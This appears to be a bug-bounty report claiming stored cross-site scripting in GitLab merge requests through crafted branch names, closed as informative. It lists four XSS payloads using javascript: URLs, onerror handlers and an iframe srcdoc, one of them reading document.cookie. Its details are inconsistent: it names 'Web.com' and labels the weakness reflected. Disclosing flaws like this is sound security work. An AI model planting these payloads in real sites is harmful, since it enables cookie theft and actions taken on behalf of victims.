Stored-XSS in merge requests
None
G
GitLab
Submitted None
Actions:
Reported by
ba5d2d132de8622c890dd60
Vulnerability Details
Technical details and impact analysis
Summary
As an attacker I could do XSS on Web.com because it is vulnerable Stored XSS, also known as persistent XSS, is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.
### Steps to reproduce
1. Go to https://gitlab.com/
2. Create a new branch with name any of these
<form><button formaction=javascript:alert(1)>CLICKME
"><img src=x onerror=alert(document.domain)>
<iframe <><a href=javascript:alert(document.cookie)>Click Here</a>=></iframe>
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
3. Create a new merge request from the new branch to master
4. XSS is saved and if you will open the readme file and add these payloads to it it will also save these payloads
### Output of checks
This bug happens on GitLab.com
## Impact
This stored-XSS allows attacker to execute arbitrary actions on behalf of victim notably via gitlab API. The attacker can steal data from whoever checks the report.
Report Details
Additional information and metadata
State
Closed
Substate
Informative
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected